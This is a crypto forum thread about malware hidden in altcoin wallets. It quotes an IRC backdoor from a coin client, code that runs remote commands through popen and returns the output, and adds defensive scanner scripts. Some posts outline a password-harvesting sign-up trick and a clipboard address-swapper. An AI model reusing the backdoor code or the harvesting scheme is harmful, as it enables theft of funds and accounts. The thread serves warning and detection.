Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
December 17, 2015, 01:58:34 PM
 #49

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?

  malware/virus detectors only foil amateur hackers(period) use sandboxie, and know that some malware can detect being opened in sandboxie... or deep freeze, but the hacker gets your coin anyway ...

 linux is the best bet, go ahead, take the plunge   Cheesy

ipodtouchdud
Newbie
*
Offline Offline

Activity: 2


View Profile
December 21, 2015, 03:54:53 PM
 #50

I have heard of dead coins.. is this a scam/malware? I would like to know about them before investing in any type of online currency. Thanks!

 *Link Removed*
siameze
Legendary
*
Offline Offline

Activity: 1064



View Profile
January 02, 2016, 04:31:40 PM
 #51

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted, just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.


BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 994



View Profile WWW
January 02, 2016, 04:48:58 PM
 #52

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

helloeverybody
Hero Member
*****
Offline Offline

Activity: 882


★YoBit.Net★ 350+ Coins Exchange & Dice


View Profile WWW
January 02, 2016, 04:53:23 PM
 #53

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted, just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

off topic slightly but you don't happen to know the name of a program I can use that will scan all my hard disk drives for wallets, do you? Would be handy if it also finds dash wallets because I've got at least 1 wallet on my hdd somewhere that I've completely lost.

siameze
Legendary
*
Offline Offline

Activity: 1064



View Profile
January 02, 2016, 04:54:01 PM
 #54

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as with any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.


presstab
Legendary
*
Offline Offline

Activity: 1288


Pivx Core Developer - HyperStake Founder


View Profile
January 15, 2016, 05:32:09 AM
 #55

And this is what allegedly brings down Cryptsy...

dooglus
Legendary
*
Offline Offline

Activity: 2366



View Profile
January 15, 2016, 05:49:28 AM
 #56

And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

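The backdoor quoted in the post above was hard to spot because `popen` only appears under the macro name `CRead`. As an added example (not code from this thread or from any coin's repository), the Python script below collects object-like `#define` aliases in a C/C++ file and flags calls that resolve to process-execution functions. The `#define` lines in the sample are reconstructed from the two listings (their exact form in the original source is not shown on the page), and the list of flagged functions is an assumption for illustration.

```python
import re
from collections import namedtuple

# Functions that start a process or shell. Assumed list for this example;
# extend it for the code base under review.
PROCESS_EXEC = {
    "popen", "_popen", "system", "execl", "execlp", "execle",
    "execv", "execvp", "execve", "WinExec", "ShellExecuteA",
    "ShellExecuteW", "CreateProcessA", "CreateProcessW",
}

# Object-like macros only: "#define NAME replacement" (no parameter list).
DEFINE_RE = re.compile(r'^\s*#\s*define\s+([A-Za-z_]\w*)\s+(.+?)\s*$')
IDENT_RE = re.compile(r'[A-Za-z_]\w*')
CALL_RE = re.compile(r'\b([A-Za-z_]\w*)\s*\(')
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')

Finding = namedtuple("Finding", "line written resolves_to")


def collect_macros(source):
    """Return {macro_name: replacement_text} for object-like macros."""
    macros = {}
    for line in source.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            macros[m.group(1)] = m.group(2)
    return macros


def resolve(name, macros):
    """Follow alias chains (A -> B -> popen) with a guard against cycles."""
    seen = set()
    while name in macros and name not in seen:
        seen.add(name)
        replacement = macros[name]
        if not IDENT_RE.fullmatch(replacement):
            break  # replacement is an expression or literal, not a rename
        name = replacement
    return name


def scan(source):
    """List every call whose name is, or resolves to, a process-exec function."""
    macros = collect_macros(source)
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if DEFINE_RE.match(line):
            continue
        # Blank out string literals, then drop // comments, so text such as
        # "system(" inside a message is not reported. Block comments and
        # multi-line macros are not handled by this simplified scanner.
        code = STRING_RE.sub('""', line).split("//", 1)[0]
        for m in CALL_RE.finditer(code):
            written = m.group(1)
            target = resolve(written, macros)
            if target in PROCESS_EXEC:
                findings.append(Finding(lineno, written, target))
    return findings


def hidden_aliases(source):
    """Macros that rename a process-exec function, even if never called here."""
    macros = collect_macros(source)
    resolved = {name: resolve(name, macros) for name in macros}
    return {n: t for n, t in resolved.items() if t in PROCESS_EXEC}


# Sample input: the listing quoted in the thread, preceded by #define lines
# reconstructed from the "macros resolved" listing (assumed form).
SAMPLE = r'''#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
'''

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"line {f.line}: {f.written}() resolves to {f.resolves_to}()")
    print("aliases:", hidden_aliases(SAMPLE))
```

A hit is a prompt for manual review, not a verdict: the reviewer still has to check whether the argument of the flagged call can be influenced by network input, as it is in the quoted listing.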
capcher
Full Member
***
Offline Offline

Activity: 224

This user is currently ignored.


View Profile
January 16, 2016, 12:09:17 PM
 #57

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
January 31, 2016, 01:58:26 PM
 #58

There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammer's server so that he could take all of the coins from those wallets and sell them.

The avatarcoin scam even included an avatar campaign of 8000AV to every user who joined the campaign, and stopped paying around January 8th.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
January 31, 2016, 02:44:55 PM
 #59

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

What you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalk.org/index.php?topic=1173703.msg13729914#msg13729914

Bitcoin_Delivery
Hero Member
*****
Offline Offline

Activity: 658



View Profile
February 29, 2016, 05:13:50 PM
 #60

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now let's see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of its suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot it looks like Geocoin (and then all its clones) has malicious code in it... or am I wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of thing?

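Before looking endpoints up in reputation services as the post above does, it helps to tally which peers the client actually keeps dialing. The following Python script is an added example, not part of the original post: it parses `debug.log` lines in the format quoted above, tolerates the reader's asterisk annotations, and reports peers retried at least a chosen number of times. The sample lines are constructed and use documentation-range addresses (RFC 5737); the function names and the threshold are assumptions.

```python
import re

# "<date> <time> trying connection <ip>:<port> lastseen=<hours>hrs", optionally
# followed by a reader's marker such as the "**" seen in the quoted log.
ATTEMPT_RE = re.compile(
    r'^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) trying connection '
    r'(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) lastseen=(\d+(?:\.\d+)?)hrs')
TIMEOUT_RE = re.compile(
    r'^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} connection timeout')


def summarize_peers(log_text):
    """Return {"ip:port": stats} for every outbound attempt in the log.

    A "connection timeout" line is attributed to the most recent attempt that
    has not been closed yet (assumes attempts are logged one at a time, as in
    the quoted log). Lines matching neither pattern, such as rows of
    asterisks, are ignored.
    """
    peers = {}
    pending = None  # endpoint of the attempt still waiting for an outcome
    for raw in log_text.splitlines():
        line = raw.strip()
        m = ATTEMPT_RE.match(line)
        if m:
            ts, ip, port, lastseen = m.groups()
            key = f"{ip}:{port}"
            entry = peers.setdefault(key, {
                "attempts": 0, "timeouts": 0,
                "first": ts, "last": ts,
                "lastseen_hrs": float(lastseen),
            })
            entry["attempts"] += 1
            entry["last"] = ts
            pending = key
        elif TIMEOUT_RE.match(line):
            if pending is not None:
                peers[pending]["timeouts"] += 1
                pending = None
    return peers


def retried_peers(peers, min_attempts=3):
    """Endpoints dialed at least min_attempts times, most frequent first."""
    rows = [(ep, s["attempts"], s["timeouts"])
            for ep, s in peers.items() if s["attempts"] >= min_attempts]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


# Constructed sample in the format of the log quoted in the post.
SAMPLE_LOG = """\
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 192.0.2.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 203.0.113.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 198.51.100.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 203.0.113.234:9748 lastseen=7.2hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:34 trying connection 192.0.2.105:9748 lastseen=52.5hrs
2015-06-12 12:41:39 trying connection 203.0.113.234:9748 lastseen=7.2hrs
2015-06-12 12:41:44 connection timeout
************************************************************
2015-06-12 12:41:45 trying connection 203.0.113.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:41:50 connection timeout
2015-06-12 12:41:51 trying connection 198.51.100.41:9748 lastseen=33.6hrs
2015-06-12 12:41:56 connection timeout
"""

if __name__ == "__main__":
    summary = summarize_peers(SAMPLE_LOG)
    for endpoint, attempts, timeouts in retried_peers(summary):
        s = summary[endpoint]
        print(f"{endpoint}: {attempts} attempts, {timeouts} timeouts, "
              f"{s['first']} .. {s['last']}")
```

A high retry count alone does not show that a peer is malicious; it only narrows down which addresses are worth checking against reputation data and against the peer and seed lists in the client's source.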
cmg777
Jr. Member
*
Offline Offline

Activity: 58


View Profile
March 13, 2016, 08:09:01 PM
 #61

Interesting... This is the reason why I don't dabble too much in AltCoins that seem fishy or have a very low/unknown value.

Lionidas
Hero Member
*****
Online Online

Activity: 756


View Profile WWW
April 14, 2016, 05:17:07 AM
 #62

I have encountered such a problem in the past. I have since stopped using bitcoin core as a wallet and have not had a wallet that you need to download to your computer to use, since I find it annoying to have to download the blockchain every time you log into the program. Not to mention it eats up a lot of my bandwidth, which I seem to be running out of when the end of the month approaches.

piranha
Jr. Member
*
Offline Offline

Activity: 52



View Profile
April 19, 2016, 11:19:03 PM
 #63

Another pretty safe and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses, keyloggers, trojans, RATs, etc. can infect you (as soon as you reboot, the bad stuff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).


+10 for Deep Freeze, thanks!! check out spyshelter also good protection against keyloggers, and such.  
BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 994



View Profile WWW
April 20, 2016, 03:37:42 AM
 #64

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as with any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.

Pretty old news. The hack that Jochen Hoenicke found for Trezor was disabled when Trezor started enforcing PINs on firmware 1.3.3. Using a Trezor with PIN and passphrase enabled is about as safe as it gets for storing your bitcoin.

There is malware that can steal bitcoin from password protected local wallets. Coinbitclip is one example and there are more.

Govagent
Newbie
*
Offline Offline

Activity: 2


View Profile
April 29, 2016, 02:33:53 PM
 #65

Good day guys, just wanna ask if there are other people in here that are facing the same issue that I have encountered. I just downloaded litecoin wallet for windows from litecoin.com, yes, it's litecoin.com not litecoin.org. And after I installed it on my pc, suddenly 2 files were added to the folder where I put the litecoin wallet installer: 1 is a batch file, the other is..... well.... I don't know what the heck the other file is.

So, after the installation was successful, I tried to delete the installation files, which.... I couldn't, same ol' "being used by the system" warning excuse, while the installation process had finished. So I started the task manager, and found that there is one file that doesn't have an explanation of what file it is on the right panel, so.... open file location, which leads to a folder named dclogs.... curious.... so I tried to open it, then wow.... only a few minutes and it had already written down 3 of my browsing activities (I noticed from the creation date of the files inside the dclogs folder). Googled it..... and I came to know that it was some kind of keylogger.... hmmm.... bummer but I'm quite lucky.....

My question is, is it even possible that the installation file from litecoin.com contains this keylogger? And I'm a bit hesitant to download from litecoin.org. Has this issue ever happened to someone in here? Are litecoin.com and litecoin.org on the same team? I would appreciate it if someone could give me (a newbie) some info on this matter, and thanks  Grin .
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
April 29, 2016, 03:34:44 PM
 #66


 never had a problem w/litecoin.org, ya gotta watch that - congrats on killing it!

Govagent
Newbie
*
Offline Offline

Activity: 2


View Profile
April 29, 2016, 03:54:47 PM
 #67

Thanks, well that means I'm gonna use the .org installation then. Thanks 4 the info groggin.
LiberOptions
Sr. Member
****
Offline Offline

Activity: 412


View Profile
May 22, 2016, 09:10:49 PM
 #68

Yes... we should really be very attentive to malware infections. The last infection attempt I found was through an email. This email seemed to come from the Dropbox team, but it wasn't. If any of you received such an email you should delete it immediately.
DeathToll
Newbie
*
Offline Offline

Activity: 1


View Profile
May 28, 2016, 07:11:48 PM
 #69

A very useful warning, People should be careful while using macros. I think people usually get attracted over using specific bots or these type of macros and get scammed.
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 06, 2016, 12:08:12 AM
 #70

the simplest malware is a website

i have never done it, but known people that have and it is so simple and never catches a single eye

you download and install wordpress and set up a good strong blog, set up a free user based subscription and that is it

most computer/internet users have 1-5 email addresses and two of those are used more than the rest

most users have three main passwords and two others

passwords vary by user based on the three security password configs, any number letter combo six keys or more, must have a letter and a number and the last that adds the special character requirement

for example, depending on the website requirements a normal user may have these three main passwords

password
password123
password123$

when they sign up for your blog, they are likely using their secondary/spam catch email and one of those main passwords

when they signed up for a bank account, paypal or another main service, they used their main email and one of those passwords

a word press site that requires a special character, number and text has just about gotten all three passwords by simply working backwards, don't spam the subscribers and ask them for a second recovery email account after thirty days and you will have the primary email, probably, if not, that is a pretty easy find on the internet

no viruses, no Trojans or keyloggers, just human nature and the inability to remember too many damned passwords

i have known developers to take it one step further and modify the sign up process, the signup would keep telling the person that the email was already in use three times and get three email addresses and then the password setup script was modified to be a real pain and say no to the simple password, asking for a capital and number, then after that password, add the special character request and boom, three main passwords and three email addresses, worst case scenario, the person gets frustrated and leaves the site

too much of a pain for me and just sooooooo wrong, but one of our past IT guys did it over and over, the hardest part was actually developing a strong and good blog that made people want to sign up, with traffic at 500 plus per day, that means around 20 new signups each day, he collected them but never did anything, just as a case in point, after two years he had around 18,000 user profiles, he spot checked more than fifty and was in their paypal within three minutes, used that to see their bank accounts and in those accounts in another three minutes with about a 87% success rate

remember when you sign up on a new site or app, you are giving that info to whoever made (or even copied) the site and i personally have both a spam email catcher and a full set of spam passwords that i use on new sites, plus my credit cards can all produce a virtual number from their site for use on unknown websites that will disappear after one use or a given amount of money spent, you almost need to be three people, the businessman, the social magnet, and then the guy who hands out info to any site that so much as looks interesting, lol
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
June 06, 2016, 07:20:50 PM
 #71

 gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 06, 2016, 08:34:58 PM
 #72

gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone

THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol
ImHash
Hero Member
*****
Offline Offline

Activity: 574


View Profile
June 08, 2016, 08:09:32 AM
 #73

wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 09, 2016, 02:18:31 AM
 #74

wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.

while what you say is more than true, it is done everyday over and over because most people are more lazy than they are smart....and that is something that every thief can count on to change from now until the end of time.    and that applies to each and every person to some degree.  anyone that disagrees would lock their car door each and every time they leave the car.  the most common excuse would be that they are not parking in a bad place or whatever, it is still an excuse and i don't lock the doors on the car that often either, but i won't make excuses, i am too damned lazy to lock/unlock the door each and every time...

but when it comes to financial security, i sure as hell dot the i's and cross the t's
Butterynoodles
Newbie
*
Offline Offline

Activity: 10


View Profile
June 13, 2016, 02:54:20 AM
 #75

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 13, 2016, 03:00:27 AM
 #76

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed

There are several bitcoin viruses...

there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from a hierarchical wallet belonging to someone else.  that way when you think you are sending BTC to your wallet, you are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much,  changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff
bitcoinboy12
Sr. Member
****
Offline Offline

Activity: 406

★YoBit.Net★ 350+ Coins Exchange & Dice


View Profile
June 14, 2016, 09:49:52 AM
 #77

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed

There are several bitcoin viruses...

there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from a hierarchical wallet belonging to someone else.  that way when you think you are sending BTC to your wallet, you are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much,  changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff

Wow that sounds simple and yet all feel really possible. Well I have to say it's not just as a "possible" hypothetical thing going on. How you said it, it's actually happening right now as we speak. Guess one thing you can do to be safe is dont go public with sites you are to show a very personal picture of you.

Perryl
Sr. Member
****
Offline Offline

Activity: 350


View Profile
July 15, 2016, 12:35:33 PM
 #78

gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone

THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol

Or maybe call Verizon and have them change your phone to them.

kattekop
Full Member
***
Offline Offline

Activity: 192


View Profile
August 01, 2016, 07:59:11 PM
 #79

An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
August 02, 2016, 05:06:32 AM
 #80

An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all

Read and/or research much ?

It was an inside job. Shocked
https://bitcointalk.org/index.php?topic=1173703.0

That aside, people will someday know them as one of, if not, the main source of crypto related malware.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
August 02, 2016, 03:48:15 PM
 #81

Case in point.. The NAV dev didn't like this line of questioning .. Roll Eyes

Quote from: Bitcoin Forum
A reply of yours, quoted below, was deleted by the starter of a self-moderated topic. There are no rules of self-moderation, so this deletion cannot be appealed. Do not continue posting in this topic if the topic-starter has requested that you leave.

You can create a new topic if you are unsatisfied with this one. If the topic-starter is scamming, post about it in Scam Accusations.

Quote
How much of your personal information is this app accessing/sharing ?

Why does it smell phishy in here !? Roll Eyes

RoseMann
Sr. Member
****
Offline Offline

Activity: 277


View Profile
August 11, 2016, 02:56:05 AM
 #82

Thank you for this warning, (i said with 30 trojan horse viruses attacking me at the same time)

Brybtc
Newbie
*
Offline Offline

Activity: 12


View Profile
August 13, 2016, 08:11:04 PM
 #83

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?

groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
September 02, 2016, 03:48:48 AM
 #84

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?
 

  use www.virustotal.com to scan small files (like wallets) it uses +/- 50 AV engines to scan, it's prolly faster than using your onboard AV

                            - BUT remember, serious hackers will have no problem hiding their payload

                                                                                      

bilebil
Newbie
*
Offline Offline

Activity: 10


View Profile WWW
September 04, 2016, 02:03:22 PM
 #85

Could you list the different scams?
Qasim1234
Sr. Member
****
Offline Offline

Activity: 260


DubaiCoin - DBIC CryptoCurrency


View Profile
September 05, 2016, 09:57:22 AM
 #86

i was infected with virus lol

shsfhs
Newbie
*
Offline Offline

Activity: 1


View Profile
September 08, 2016, 11:50:59 AM
 #87

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
